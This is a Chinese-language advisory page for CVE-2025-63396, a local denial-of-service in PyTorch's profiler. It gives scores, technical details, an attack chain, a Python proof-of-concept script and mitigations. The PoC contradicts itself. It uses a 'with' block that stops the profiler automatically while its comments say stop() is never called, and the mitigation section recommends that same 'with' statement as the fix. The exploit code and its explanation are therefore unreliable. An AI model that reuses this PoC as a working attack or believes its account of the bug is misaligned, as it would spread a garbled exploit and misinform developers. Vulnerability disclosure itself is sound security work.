CVE-2025-63396 PyTorch profiler拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-63396

漏洞类型

拒绝服务

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PyTorch

漏洞概述

CVE-2025-63396是PyTorch深度学习框架中的一个拒绝服务漏洞。该漏洞影响PyTorch v2.5和v2.7.1版本，源于在使用torch.profiler.profile进行性能分析时，开发者遗漏调用profiler.stop()方法。当PythonTracer在最终化过程中销毁profiler对象时，会导致程序崩溃或无限挂起，从而造成拒绝服务（DoS）攻击。攻击者可以通过本地低权限方式触发此漏洞，无需任何用户交互。漏洞的CVSS评分为3.3，属于低危级别，主要影响系统的可用性。该问题已被报告至PyTorch官方项目，并提供了相应的修复建议。

技术细节

该漏洞存在于PyTorch的性能分析模块中。torch.profiler.profile是PyTorch提供的性能分析工具，用于收集和分析模型训练过程中的性能数据。在使用PythonTracer（Python追踪器）时，如果开发者忘记显式调用profiler.stop()方法来停止性能分析，当profiler对象被垃圾回收或程序退出时，会触发析构函数中的清理逻辑。由于缺少正确的停止调用，PythonTracer在最终化过程中可能会尝试访问已释放的资源或进入死锁状态，导致以下问题：1) 进程在析构阶段崩溃；2) 进程在清理阶段无限挂起，无法正常退出；3) 释放未正确管理的资源导致内存问题。攻击者只需在本地环境中创建一个使用profiler但未正确停止的分析脚本，即可触发此漏洞。这对于长时间运行的训练任务或需要频繁启动/停止分析的生产环境尤其危险。

攻击链分析

STEP 1

步骤1

攻击者在本地环境获取PyTorch v2.5或v2.7.1版本

STEP 2

步骤2

编写Python脚本使用torch.profiler.profile进行性能分析

STEP 3

步骤3

在分析完成后故意遗漏profiler.stop()调用

STEP 4

步骤4

当PythonTracer进行对象最终化时，触发崩溃或挂起

STEP 5

步骤5

导致深度学习训练进程崩溃或无限等待，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-63396 PoC - PyTorch profiler DoS
Description: Omission of profiler.stop() causes torch.profiler.profile 
             (PythonTracer) to crash or hang during finalization
Author: Security Researcher
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-63396
"""

import torch
import torch.profiler
import sys
import time
import os

def trigger_vulnerability():
    """
    Trigger the DoS vulnerability by using profiler without calling stop()
    """
    print(f"[+] PyTorch version: {torch.__version__}")
    print(f"[+] Triggering CVE-2025-63396 vulnerability...")
    
    # Create profiler with PythonTracer - BUG: missing profiler.stop()
    try:
        with torch.profiler.profile(
            activities=[
                torch.profiler.ProfilerActivity.CPU,
                torch.profiler.ProfilerActivity.CUDA,
            ],
            schedule=torch.profiler.schedule(wait=1, warmup=1, active=3, repeat=1),
            on_trace_ready=torch.profiler.tensorboard_trace_handler('./log'),
            record_shapes=True,
            profile_memory=True,
            with_stack=True
        ) as prof:
            # Perform some computation
            model = torch.nn.Linear(100, 100)
            optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
            
            for step in range(5):
                # Simulate training step
                data = torch.randn(32, 100)
                target = torch.randn(32, 100)
                
                output = model(data)
                loss = torch.nn.functional.mse_loss(output, target)
                
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                
                prof.step()
                
            # BUG: profiler.stop() is NOT called
            # This will cause crash/hang during finalization
            print("[-] WARNING: profiler.stop() was not called!")
            print("[-] Profiler will crash/hang during cleanup...")
            
    except Exception as e:
        print(f"[!] Exception caught: {e}")
        return False
    
    # When exiting this scope, the profiler will be finalized
    # without proper cleanup, potentially causing DoS
    print("[+] Function completed, cleanup will occur...")
    return True

def main():
    print("=" * 60)
    print("CVE-2025-63396 - PyTorch Profiler DoS Vulnerability PoC")
    print("=" * 60)
    
    # Check PyTorch version
    version = torch.__version__
    print(f"[*] PyTorch Version: {version}")
    
    # Check if version is affected (v2.5 or v2.7.1)
    affected_versions = ['2.5', '2.7.1']
    is_affected = any(v in version for v in affected_versions)
    
    if is_affected:
        print(f"[!] This PyTorch version ({version}) is VULNERABLE")
    else:
        print(f"[*] This PyTorch version ({version}) may not be affected")
    
    print("\n[*] Executing vulnerable code...")
    print("[*] Expected behavior: Crash or hang during cleanup\n")
    
    # Set timeout to detect hang
    import signal
    
    def timeout_handler(signum, frame):
        print("\n[!] TIMEOUT: Process appears to be hanging (DoS triggered)")
        sys.exit(1)
    
    # Set 10 second timeout
    signal.signal(signal.SIGALRM, timeout_handler)
    signal.alarm(10)
    
    try:
        trigger_vulnerability()
        print("\n[+] Script completed - check if process hung during cleanup")
    except KeyboardInterrupt:
        print("\n[!] Interrupted by user")
    finally:
        signal.alarm(0)

if __name__ == "__main__":
    main()

影响范围

PyTorch 2.5

PyTorch 2.7.1

防御指南

临时缓解措施

在代码中始终使用with语句或显式调用profiler.stop()方法确保性能分析器正确关闭。对于现有代码，添加检查确保所有torch.profiler.profile调用都配有对应的stop()调用，或使用上下文管理器自动管理生命周期。在升级到修复版本之前，可以临时禁用profiler功能或将其部署在隔离环境中运行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63396
3 Details https://www.cvedetails.com/cve/CVE-2025-63396/
4 VulDB https://vuldb.com/cve/CVE-2025-63396
5 Link http://pytorch.com
6 Link https://github.com/Daisy2ang
7 Link https://github.com/pytorch/pytorch
8 Link https://github.com/pytorch/pytorch/issues/156563